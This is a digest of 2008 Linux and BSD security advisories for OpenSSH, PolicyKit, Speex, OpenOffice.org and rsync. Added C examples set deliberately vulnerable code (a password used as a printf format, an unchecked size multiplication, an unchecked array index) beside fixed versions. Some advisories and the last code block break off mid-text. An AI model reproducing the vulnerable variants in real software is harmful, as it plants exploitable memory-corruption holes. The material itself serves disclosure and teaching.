FreeBSD Security Advisory FreeBSD-SA-08:05.openssh
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=============================================================================
FreeBSD-SA-08:05.openssh                                    Security Advisory
                                                          The FreeBSD Project

Topic:          OpenSSH X11-forwarding privilege escalation

Category:       contrib
Module:         openssh
Announced:      2008-04-17
Credits:        Timo Juhani Lindfors
Affects:        All supported versions of FreeBSD
Corrected:      2008-04-16 23:58:33 UTC (RELENG_7, 7.0-STABLE)
                2008-04-16 23:58:52 UTC (RELENG_7_0, 7.0-RELEASE-p1)
                2008-04-16 23:59:35 UTC (RELENG_6, 6.3-STABLE)
                2008-04-16 23:59:48 UTC (RELENG_6_3, 6.3-RELEASE-p2)
                2008-04-17 00:00:04 UTC (RELENG_6_2, 6.2-RELEASE-p12)
                2008-04-17 00:00:28 UTC (RELENG_6_1, 6.1-RELEASE-p24)
                2008-04-17 00:00:41 UTC (RELENG_5, 5.5-STABLE)
                2008-04-17 00:00:54 UTC (RELENG_5_5, 5.5-RELEASE-p20)
CVE Name:       CVE-2008-1483

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:http://security.FreeBSD.org/>.

I.   Background

OpenSSH is an implementation of the SSH protocol suite, providing an
encrypted and authenticated transport for a variety of services,
including remote shell access.

The OpenSSH server daemon (sshd) provides support for the X11 protocol
by binding to a port on the server and forwarding any connections which
are made to that port.

II.  Problem Description

When logging in via SSH with X11-forwarding enabled, sshd(8) fails to
correctly handle the case where it fails to bind to an IPv4 port but
successfully binds to an IPv6 port. In this case, applications which
use X11 will connect to the IPv4 port, even though it had not been bound
by sshd(8) and is therefore not being securely forwarded.

III. Impact

A malicious user could listen for X11 connections on an unused IPv4
port, e.g. tcp port 6010. When an unaware user logs in and sets up X11
forwarding, the malicious user can capture all X11 data sent over the
port, potentially disclosing sensitive information or allowing the
execution of commands with the privileges of the user using the X11
forwarding.

NOTE WELL: FreeBSD ships with IPv6 enabled by default in the GENERIC
and SMP kernels, so users are vulnerable even if they have not
explicitly enabled IPv6 networking.

IV.  Workaround

Perform either of the following, then restart sshd(8) so that the new
configuration takes effect:

Disable support for IPv6 in the sshd(8) daemon by setting the option

	AddressFamily inet

in /etc/ssh/sshd_config. Note that this restricts all SSH connections
to IPv4, not only X11 forwarding.

Disable support for X11 forwarding in the sshd(8) daemon by setting the
option

	X11Forwarding no

in /etc/ssh/sshd_config.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to 5-STABLE, 6-STABLE, or 7-STABLE,
or to the RELENG_7_0, RELENG_6_3, RELENG_6_2, RELENG_6_1, or RELENG_5_5
security branch dated after the correction date.

2) To patch your present system:

The following patch has been verified to apply to FreeBSD 5.5, 6.1, 6.2,
6.3, and 7.0 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch http://security.FreeBSD.org/patches/SA-08:05/openssh.patch
# fetch http://security.FreeBSD.org/patches/SA-08:05/openssh.patch.asc

b) Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/secure/lib/libssh
# make obj && make depend && make && make install
# cd /usr/src/secure/usr.sbin/sshd
# make obj && make depend && make && make install
# /etc/rc.d/sshd restart

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Branch                                                           Revision
  Path
- -------------------------------------------------------------------------
RELENG_5
  src/crypto/openssh/channels.c                                  1.18.2.1
RELENG_5_5
  src/UPDATING                                              1.342.2.35.2.21
  src/sys/conf/newvers.sh                                    1.62.2.21.2.22
  src/crypto/openssh/channels.c                                  1.18.8.1
RELENG_6
  src/crypto/openssh/channels.c                                  1.20.2.3
RELENG_6_3
  src/UPDATING                                               1.416.2.37.2.6
  src/sys/conf/newvers.sh                                     1.69.2.15.2.5
  src/crypto/openssh/channels.c                              1.20.2.2.4.1
RELENG_6_2
  src/UPDATING                                              1.416.2.29.2.16
  src/sys/conf/newvers.sh                                    1.69.2.13.2.15
  src/crypto/openssh/channels.c                              1.20.2.2.2.1
RELENG_6_1
  src/UPDATING                                              1.416.2.22.2.27
  src/sys/conf/newvers.sh                                    1.69.2.11.2.26
  src/crypto/openssh/channels.c
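The display-allocation logic the advisory describes, as an added illustration that is not part of the advisory and not the OpenSSH channels.c code: a simulated port table stands in for the kernel so the program runs without real sockets or IPv6, the attacker has already bound tcp/6010 on IPv4, and two allocators are run side by side. The pre-fix one accepts a display as soon as any address family bound; the corrected one uses a display only when every family bound and otherwise releases the half-bound socket and tries the next display number. All type and function names here are this example's own.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Simulated kernel view of which (family, port) pairs are already bound.
 * Constructed for this example only. */
enum { FAM_INET = 0, FAM_INET6 = 1, NFAM = 2 };
#define X11_BASE_PORT    6000
#define X11_MAX_DISPLAYS 1000
#define PORT_SPACE       (X11_BASE_PORT + X11_MAX_DISPLAYS)

static bool port_in_use[NFAM][PORT_SPACE];

/* bind(2) stand-in: fails exactly when another socket already owns the port. */
static bool sim_bind(int fam, int port)
{
    if (port_in_use[fam][port])
        return false;
    port_in_use[fam][port] = true;
    return true;
}

static void sim_close(int fam, int port) { port_in_use[fam][port] = false; }

struct x11_listener {
    int  display;      /* -1 if no display could be allocated */
    bool bound[NFAM];  /* families sshd is actually listening on */
};

/* Pre-fix logic as the advisory describes it: a bind() failure on one family
 * is skipped and the display is accepted as soon as any socket bound. */
struct x11_listener alloc_display_vulnerable(int first_display)
{
    struct x11_listener l = { -1, { false, false } };
    for (int d = first_display; d < X11_MAX_DISPLAYS; d++) {
        int port = X11_BASE_PORT + d;
        bool any = false;
        for (int fam = 0; fam < NFAM; fam++) {
            l.bound[fam] = sim_bind(fam, port);
            if (l.bound[fam]) any = true;
        }
        if (any) { l.display = d; return l; }
    }
    return l;
}

/* Corrected logic: the display is used only if every family bound; otherwise
 * the sockets bound so far are closed and the next display is tried. */
struct x11_listener alloc_display_fixed(int first_display)
{
    struct x11_listener l = { -1, { false, false } };
    for (int d = first_display; d < X11_MAX_DISPLAYS; d++) {
        int port = X11_BASE_PORT + d;
        bool all = true;
        for (int fam = 0; fam < NFAM; fam++) {
            l.bound[fam] = sim_bind(fam, port);
            if (!l.bound[fam]) all = false;
        }
        if (all) { l.display = d; return l; }
        for (int fam = 0; fam < NFAM; fam++)
            if (l.bound[fam]) { sim_close(fam, port); l.bound[fam] = false; }
    }
    return l;
}

/* Advisory scenario: a local attacker already listens on tcp/6010 over IPv4
 * before the victim's session asks sshd for display :10. */
struct x11_listener run_scenario(int fixed)
{
    memset(port_in_use, 0, sizeof port_in_use);
    port_in_use[FAM_INET][6010] = true;              /* attacker's listener */
    return fixed ? alloc_display_fixed(10) : alloc_display_vulnerable(10);
}

int scenario_display(int fixed)        { return run_scenario(fixed).display; }
int scenario_bound(int fixed, int fam) { return run_scenario(fixed).bound[fam]; }
/* Does sshd still hold an IPv6 socket on the contested port afterwards? */
int scenario_sshd_holds_6010_v6(int fixed)
{
    run_scenario(fixed);
    return port_in_use[FAM_INET6][6010];
}

int main(void)
{
    struct x11_listener v = run_scenario(0), f = run_scenario(1);
    printf("vulnerable: display :%d inet=%d inet6=%d (X clients go to 6010/IPv4, held by the attacker)\n",
           v.display, v.bound[FAM_INET], v.bound[FAM_INET6]);
    printf("fixed:      display :%d inet=%d inet6=%d\n",
           f.display, f.bound[FAM_INET], f.bound[FAM_INET6]);
    return 0;
}
```

Build with `cc -std=c99` and run: the vulnerable path hands out display :10 with only the IPv6 socket bound, which is precisely the state in which X clients connect to the IPv4 port the attacker owns; the fixed path skips to :11 and leaves nothing of sshd's on port 6010.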
[ MDVSA-2008:087 ] - Updated policykit package fixes format string vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:087
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : policykit
 Date    : April 16, 2008
 Affected: 2008.1
 _______________________________________________________________________

 Problem Description:

 A format string vulnerability in the grant helper, in PolicyKit 0.7 and
 earlier, allows attackers to cause a denial of service (crash) and
 possibly execute arbitrary code via format strings in a password.

 The updated package has been patched to correct this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1658
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.1:
 aa8e182bb5e5d8fe952cfab4c62bf055  2008.1/i586/libpolkit2-0.7-5.1mdv2008.1.i586.rpm
 2c2de3341fd2e7b0181215c49b373953  2008.1/i586/libpolkit-devel-0.7-5.1mdv2008.1.i586.rpm
 54bc0d67f70ada707da9ac5d35ac6f8a  2008.1/i586/policykit-0.7-5.1mdv2008.1.i586.rpm
 864e3c1f5c99ad74a284fe3f35964515  2008.1/i586/policykit-docs-0.7-5.1mdv2008.1.i586.rpm
 e19c68b55d06d4ad8a00a9c82e38e3fa  2008.1/SRPMS/policykit-0.7-5.1mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 79e9c91841bf90f09fd7184050164bfe  2008.1/x86_64/lib64polkit2-0.7-5.1mdv2008.1.x86_64.rpm
 3bb998cc6595c0f70c47cb22f411962b  2008.1/x86_64/lib64polkit-devel-0.7-5.1mdv2008.1.x86_64.rpm
 16ede4d785e987f5e65361570d80bcdc  2008.1/x86_64/policykit-0.7-5.1mdv2008.1.x86_64.rpm
 c114e50ab7f564a281ddd1096dbde53c  2008.1/x86_64/policykit-docs-0.7-5.1mdv2008.1.x86_64.rpm
 e19c68b55d06d4ad8a00a9c82e38e3fa  2008.1/SRPMS/policykit-0.7-5.1mdv2008.1.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFIBndVmqjQ0CJFipgRAtAPAKCGzbow3RcmLOWx7pcsGpW5Y+O6AQCglR6a
RylBQh4kJd6y3YT4HJRk3FY=
=sdlj
-----END PGP SIGNATURE-----
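The bug class behind CVE-2008-1658, as an added example that is not the PolicyKit grant helper's code (the advisory quotes no source): a printf-style message routine is handed the password itself as its format string, next to the corrected call that uses a fixed format and passes the untrusted text as a `%s` argument. The routine name `emit()` and the idea of an authentication-failure message are assumptions made for the example. The vulnerable variant is exercised only with the harmless `%%` directive; any other directive would read, and with `%n` write, whatever happens to be on the stack.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define MSG_MAX 256
static char msg_buf[MSG_MAX];

/* Message sink standing in for whatever the helper used to report a failed
 * authentication (assumed name). It is an ordinary printf-style function:
 * whatever arrives as fmt is interpreted, directives included. */
static int emit(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int r = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return r;
}

/* Vulnerable pattern: the user-supplied password IS the format string.
 * "%s%s%s%s" in a password dereferences stack slots as char pointers and
 * "%n" writes a count through one of them; both are undefined behaviour.
 * Only the harmless "%%" is fed to this function in the checks below. */
const char *report_vulnerable(const char *password)
{
    emit(msg_buf, sizeof msg_buf, password);
    return msg_buf;
}

/* Hardened pattern: a fixed format; the untrusted text can only ever fill a
 * "%s" and is copied verbatim, '%' characters and all. */
const char *report_fixed(const char *password)
{
    emit(msg_buf, sizeof msg_buf, "%s", password);
    return msg_buf;
}

/* Audit aid for inputs captured in logs or crash dumps: how many conversion
 * directives does a string carry? Not a fix; the fix is the fixed format. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') { p++; continue; }   /* escaped percent, harmless */
        n++;
    }
    return n;
}
```

With the input `100%%` the vulnerable path collapses it to `100%`, showing the formatter at work on attacker text; the fixed path reproduces the input unchanged. A password containing `%n` or `%s` is simply data to the fixed version and a write or read primitive to the vulnerable one.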
[oCERT-2008-004] multiple speex implementations insufficient boundary checks
2008/04/17 #2008-004 multiple speex implementations insufficient boundary checks

Description:

The reference speex decoder from the Speex library performs insufficient
boundary checks on a header structure read from user input; this has been
reported in the oCERT-2008-002 advisory.

Further investigation showed that several packages include similar code and
are therefore vulnerable.

In order to prevent the usage of incorrect header processing reference code,
the speex_packet_to_header() function has been modified to bound the
returned mode values in Speex >= 1.2beta3.2. This change automatically fixes
applications that use the Speex library dynamically.

Affected version:

gstreamer-plugins-good <= 0.10.8
SDL_sound <= 1.0.1
Speex <= 1.1.12 (speexdec)
Sweep <= 0.9.2
vorbis-tools <= 1.2.0
VLC Media Player <= 0.8.6f
xine-lib <= 1.1.11.1
XMMS speex plugin

Fixed version:

gstreamer-plugins-good, >= 0.10.8 (patched in CVS)
SDL_sound, patched in CVS
Speex >= 1.2beta3.2 (patched in CVS)
Sweep >= 0.9.3
vorbis-tools, patched in CVS
VLC Media Player, N/A
xine-lib >= 1.1.12
XMMS speex plugin, N/A

Credit: see oCERT-2008-002; additionally we would like to thank Tomas Hoger
from the Red Hat Security Response Team for his help in investigating the
issue.

CVE: CVE-2008-1686

Timeline:

2008-04-10: investigation of oCERT-2008-002 leads to discovery of more
            affected packages
2008-04-10: Speex header processing code fixed in CVS
2008-04-11: contacted upstream maintainers and affected vendors
2008-04-11: gstreamer-plugins-good patched in CVS
2008-04-11: sweep 0.9.3 released
2008-04-11: SDL_sound patched in CVS
2008-04-14: vorbis-tools patched in CVS
2008-04-14: xine-lib 1.1.12 released
2008-04-17: advisory release

References:

http://www.ocert.org/advisories/ocert-2008-2.html
http://trac.xiph.org/changeset/14701
http://webcvs.freedesktop.org/gstreamer/gst-plugins-good/ext/speex/gstspeexdec.c?r1=1.40&r2=1.41
http://trac.metadecks.org/changeset/554
http://svn.icculus.org/SDL_sound?view=rev&revision=537
http://svn.icculus.org/SDL_sound?view=rev&revision=538
http://trac.xiph.org/changeset/14728
http://hg.debian.org/hg/xine-lib/xine-lib?cmd=changeset;node=66e1654718fb;style=gitweb

Links:

http://gstreamer.freedesktop.org/modules/gst-plugins-good.html
http://icculus.org/SDL_sound
http://www.speex.org
http://www.metadecks.org/software/sweep/
http://xiph.org
http://www.videolan.org/vlc
http://xinehq.de

Permalink:

http://www.ocert.org/advisories/ocert-2008-004.html

--
Andrea Barisani | Founder & Project Coordinator
          oCERT | Open Source Computer Emergency Response Team

[EMAIL PROTECTED]
http://www.ocert.org

 0x864C9B9E 0A76 074A 02CD E989 CE7F AC3F DA47 578E 864C 9B9E
          "Pluralitas non est ponenda sine necessitate"
[SECURITY] [DSA 1547-1] New OpenOffice.org packages fix arbitrary code execution
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1547-1                      [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
April 17th, 2008                        http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : openoffice.org
Vulnerability  : several
Problem type   : local (remote)
Debian-specific: no
CVE IDs        : CVE-2007-5745 CVE-2007-5746 CVE-2007-5747 CVE-2008-0320

Several security related problems have been discovered in OpenOffice.org,
the free office suite. The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2007-5745, CVE-2007-5747

    Several bugs have been discovered in the way OpenOffice.org parses
    Quattro Pro files that may lead to an overflow in the heap,
    potentially leading to the execution of arbitrary code.

CVE-2007-5746

    Specially crafted EMF files can trigger a buffer overflow in the
    heap that may lead to the execution of arbitrary code.

CVE-2008-0320

    A bug has been discovered in the processing of OLE files that can
    cause a buffer overflow in the heap, potentially leading to the
    execution of arbitrary code.

Recently reported problems in the ICU library, against which
OpenOffice.org is linked, are fixed in the separate libicu packages
shipped with DSA 1511.

For the old stable distribution (sarge) these problems have been fixed
in version 1.1.3-9sarge9.

For the stable distribution (etch) these problems have been fixed in
version 2.0.4.dfsg.2-7etch5.

For the testing (lenny) and unstable (sid) distributions these problems
have been fixed in version 2.4.0~ooh680m5-1.

We recommend that you upgrade your openoffice.org packages.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org_1.1.3-9sarge9.dsc
      Size/MD5 checksum:      2878 8b2bf5fad94194078687afd08a774051
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org_1.1.3-9sarge9.diff.gz
      Size/MD5 checksum:   4663713 95fc9e73f779d582edd4df28c5bdc265
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org_1.1.3.orig.tar.gz
      Size/MD5 checksum: 166568714 5250574bad9906b38ce032d04b765772

  Architecture independent components:

    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-af_1.1.3-9sarge9_all.deb
      Size/MD5 checksum:   2648250 4c65359ce6ee948e155c3200435e3882
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-ar_1.1.3-9sarge9_all.deb
      Size/MD5 checksum:   2700940 f0f7cd9f4e836f69cb01d9b414a7dd8f
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-ca_1.1.3-9sarge9_all.deb
      Size/MD5 checksum:   2697858 8f73d02ce7e1801f9c50e7625324b780
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-cs_1.1.3-9sarge9_all.deb
      Size/MD5 checksum:   3607590 f50b4014d8141f064b281b0cb8d9c115
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-cy_1.1.3-9sarge9_all.deb
      Size/MD5 checksum:   2664720 61b0feccf81710f128111fe1caab6773
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-da_1.1.3-9sarge9_all.deb
      Size/MD5 checksum:   3604230 bb6543e7dfd37b8b6751eb199450cae2
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-de_1.1.3-9sarge9_all.deb
      Size/MD5 checksum:   3491518 cd0c55f2d047f03e1ca1b4167fea7f0e
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-el_1.1.3-9sarge9_all.deb
      Size/MD5 checksum:   2746570 6cd2c910bd469e26d7fcb37dff4512f5
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-en_1.1.3-9sarge9_all.deb
      Size/MD5 checksum:   3558088 9b1510871540ac5dcc350ea0ad4b3a6b
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-es_1.1.3-9sarge9_all.deb
      Size/MD5 checksum:   3598796 d0ea026676b3084deb1fc3a77c687e53
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-et_1.1.3-9sarge9_all.deb
      Size/MD5 checksum:   2650338 c3db9bce36a17a0776381942063e4ea4
[ GLSA 200804-16 ] rsync: Execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200804-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: rsync: Execution of arbitrary code
      Date: April 17, 2008
      Bugs: #216887
        ID: 200804-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A buffer overflow in rsync might lead to the remote execution of
arbitrary code when extended attributes are being used.

Background
==========

rsync is a file transfer program to keep remote directories
synchronized.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  net-misc/rsync            < 2.6.9-r6                   >= 2.6.9-r6

Description
===========

Sebastian Krahmer of SUSE reported an integer overflow in the
expand_item_list() function in the file util.c which might lead to a
heap-based buffer overflow when extended attribute (xattr) support is
enabled.

Impact
======

A remote attacker could send a file containing specially crafted
extended attributes to an rsync daemon, or entice a user to sync from an
rsync server containing specially crafted files, possibly leading to the
execution of arbitrary code. Please note that extended attributes are
only enabled when USE=acl is enabled, which is the default setting.

Workaround
==========

Disable extended attributes in the rsync daemon by setting

    refuse options = xattrs

in the file /etc/rsyncd.conf (or append xattrs to an existing refuse
statement). When synchronizing to a server, do not provide the -X
parameter to rsync. You can also disable the acl USE flag for rsync and
recompile the package.

Resolution
==========

All rsync users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-misc/rsync-2.6.9-r6"

References
==========

  [ 1 ] CVE-2008-1720
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1720

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200804-16.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
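The integer-overflow-to-heap-overflow pattern the GLSA attributes to expand_item_list(), as an added illustration that is not the rsync source: a growable array is resized by doubling, and the byte count is computed as items times item size. The unchecked multiplication wraps for an attacker-chosen count (here a crafted number of 16-byte extended-attribute records), so realloc() returns a tiny buffer that the subsequent copies overrun; the checked version refuses the growth. The struct mirrors rsync's item_list in spirit but every name, the initial size of 16 slots and the 16-byte record size are this example's assumptions.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Growable array modelled on rsync's item_list; names are this example's own. */
struct item_list {
    void  *items;
    size_t count;      /* items in use */
    size_t malloced;   /* items allocated */
};

/* Vulnerable size computation: new_items * item_size is evaluated in size_t
 * with no check, so an attacker-chosen count wraps to a small byte total.
 * realloc() then hands back far less memory than the caller goes on to fill,
 * and the writes that follow overrun the heap chunk. */
size_t alloc_bytes_vulnerable(size_t new_items, size_t item_size)
{
    return new_items * item_size;
}

/* Hardened computation: 0 means "refuse", otherwise the exact byte total.
 * Both the grown item count and the multiplication are range-checked. */
size_t alloc_bytes_checked(size_t old_items, size_t new_items, size_t item_size)
{
    if (new_items <= old_items || item_size == 0)
        return 0;                              /* count wrapped or did not grow */
    if (new_items > SIZE_MAX / item_size)
        return 0;                              /* product would exceed SIZE_MAX */
    return new_items * item_size;
}

/* Grow lp to hold at least lp->count + incr items of item_size bytes,
 * doubling as rsync does. Returns 1 on success, 0 on overflow or ENOMEM. */
int expand_item_list(struct item_list *lp, size_t item_size, size_t incr)
{
    if (incr > SIZE_MAX - lp->count)
        return 0;                              /* count + incr itself wraps */
    size_t need = lp->count + incr;
    if (need <= lp->malloced)
        return 1;                              /* already large enough */
    size_t new_size = lp->malloced ? lp->malloced : 16;   /* assumed initial size */
    while (new_size < need) {
        if (new_size > SIZE_MAX / 2)
            return 0;                          /* doubling would wrap */
        new_size *= 2;
    }
    size_t bytes = alloc_bytes_checked(lp->malloced, new_size, item_size);
    if (bytes == 0)
        return 0;
    void *p = realloc(lp->items, bytes);
    if (p == NULL)
        return 0;
    lp->items = p;
    lp->malloced = new_size;
    return 1;
}

/* Walk-through of the advisory's scenario: a list of 16-byte xattr records
 * grows normally, then a crafted record count arrives. Returns 1 when the
 * ordinary growth succeeded and the crafted growth was refused with the
 * list left intact. */
int demo_crafted_xattr_count(void)
{
    struct item_list l = { NULL, 0, 0 };
    if (!expand_item_list(&l, 16, 1)) return 0;      /* -> 16 slots */
    l.count = 16;
    if (!expand_item_list(&l, 16, 1)) return 0;      /* -> 32 slots */
    size_t crafted = SIZE_MAX / 16 + 2;              /* * 16 wraps to 16 bytes if unchecked */
    int refused = !expand_item_list(&l, 16, crafted);
    int intact  = (l.malloced == 32);
    free(l.items);
    return refused && intact;
}
```

The crafted count is chosen so that `alloc_bytes_vulnerable(crafted, 16)` is exactly 16 on any word size: SIZE_MAX/16 + 2 multiplied by 16 is 2^N + 16, which wraps to 16. On a real decoder the next record copy would then write past a 16-byte chunk; the checked path never allocates.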
[ GLSA 200804-17 ] Speex: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200804-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Speex: User-assisted execution of arbitrary code
      Date: April 17, 2008
      Bugs: #217715
        ID: 200804-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Improper input validation in Speex might lead to array indexing
vulnerabilities in multiple player applications.

Background
==========

Speex is an audio compression format designed for speech that is free
of patent restrictions.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  media-libs/speex          < 1.2_beta3_p2             >= 1.2_beta3_p2

Description
===========

oCERT reported that the Speex library does not properly validate the
mode value it derives from Speex streams, allowing for array indexing
vulnerabilities inside multiple player applications. Within Gentoo,
xine-lib, VLC, gst-plugins-speex from the GStreamer Good Plug-ins,
vorbis-tools, libfishsound, Sweep, SDL_sound, and speexdec were found
to be vulnerable.

Impact
======

A remote attacker could entice a user to open a specially crafted Speex
file or network stream with an application listed above. This might
lead to the execution of arbitrary code with the privileges of the user
playing the file.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Speex users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-libs/speex-1.2_beta3_p2"

References
==========

  [ 1 ] CVE-2008-1686
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1686

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200804-17.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
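The unchecked mode index described in both oCERT-2008-004 and GLSA 200804-17 above, as an added example that is neither the libspeex source nor any of the listed players' code: a constructed Speex stream header is parsed, the pre-fix path hands the raw 32-bit mode field back to callers who index the per-mode table with it, and the corrected path (in the spirit of the speex_packet_to_header() change the oCERT advisory mentions) rejects any mode outside the table before anyone indexes with it. The header field offsets follow the Speex header layout (8-byte magic, 20-byte version string, then little-endian 32-bit fields, mode being the fourth); the three-entry mode table, its descriptor struct, the remaining header values and all function names are this example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Three decoder modes (narrowband, wideband, ultra-wideband); the descriptor
 * struct is this example's stand-in for the library's per-mode tables. */
#define SPEEX_NB_MODES 3
struct mode_desc { const char *name; int frame_size; };
static const struct mode_desc mode_table[SPEEX_NB_MODES] = {
    { "narrowband", 160 }, { "wideband", 320 }, { "ultra-wideband", 640 },
};

/* Stream header layout: 8-byte "Speex   " magic, 20-byte version string,
 * then little-endian int32 fields; 'mode' is the fourth of them. */
#define HDR_MODE_OFF 40
#define HDR_MIN_LEN  52

static int32_t le32(const uint8_t *p)
{
    uint32_t v = (uint32_t)p[0] | (uint32_t)p[1] << 8 |
                 (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
    return (int32_t)v;
}
static void put_le32(uint8_t *p, int32_t x)
{
    uint32_t v = (uint32_t)x;
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

/* Pre-fix handling: the mode field is returned as-is and callers index
 * mode_table[] with it. Anything outside 0..2 reads beyond the table; a huge
 * or negative value lands far outside it. -1 here only means "bad magic". */
int32_t header_mode_vulnerable(const uint8_t *hdr, size_t len)
{
    if (len < HDR_MIN_LEN || memcmp(hdr, "Speex   ", 8) != 0)
        return -1;
    return le32(hdr + HDR_MODE_OFF);
}

/* Corrected handling: a mode outside the table is rejected up front, so no
 * caller, in the library or in a player's own copy of this code, can index
 * with it. */
int32_t header_mode_fixed(const uint8_t *hdr, size_t len)
{
    int32_t mode = header_mode_vulnerable(hdr, len);
    if (mode < 0 || mode >= SPEEX_NB_MODES)
        return -1;
    return mode;
}

/* What a decoder actually wants from the header; -1 means "reject stream". */
int frame_size_for_header(const uint8_t *hdr, size_t len)
{
    int32_t mode = header_mode_fixed(hdr, len);
    return mode < 0 ? -1 : mode_table[mode].frame_size;
}

/* Constructed header carrying the given mode; other fields are plausible
 * placeholders that nothing here reads. */
size_t build_header(uint8_t out[HDR_MIN_LEN], int32_t mode)
{
    memset(out, 0, HDR_MIN_LEN);
    memcpy(out, "Speex   ", 8);
    memcpy(out + 8, "1.2beta3", 8);
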